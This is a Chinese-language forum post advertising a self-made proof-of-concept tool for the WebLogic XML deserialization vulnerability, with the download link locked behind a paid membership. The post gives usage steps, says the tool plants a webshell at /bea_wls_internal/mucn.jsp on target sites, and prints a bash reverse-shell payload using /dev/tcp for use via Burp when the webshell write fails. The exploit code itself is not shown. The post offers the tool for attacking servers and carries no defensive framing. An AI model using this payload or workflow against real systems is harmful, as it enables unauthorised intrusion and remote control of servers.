无名商城论坛

搜索
查看: 274|回复: 0

[其他技术] 【自制poc】weblogicXML反序漏洞

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 17:04:58 | 显示全部楼层 |阅读模式
weblogic xml反序poc

地址:
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】


weblogicXML
Description
weblogicXML漏洞检测利用工具

所需配置项:
python3+
requests模块
模块安装:
没用装request模块的运行如下命令安装模块

pip install requests

使用方法:
git clone
本帖隐藏的内容需要【资源会员】才可浏览,您需要升级才可浏览,点击这里升级【资源会员】

python3 weblogicXML.py

可能会出现的问题:
输入地址后程序长时间无反应或等待一段时间后出现报错。

如图1

解决方法:可能木马已经写入成功,请自行访问目标网站/bea_wls_internal/mucn.jsp 若存在如下页面说明木马写入成功。

如图2

程序运行结果为:目标可能存在weblogicXML反序漏洞,但写马失败,请自行手动检测
解释:木马应该确实没有写入成功。

如图3

解决:你可以使用burp发包方式向目标发送POC,进行反弹shell测试(一般这种是可以成功反弹shell的)。

反弹shell POC


/bin/bash

-c

bash -i >& /dev/tcp/服务器地址/服务器端口 0>&1

其他问题:暂无
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表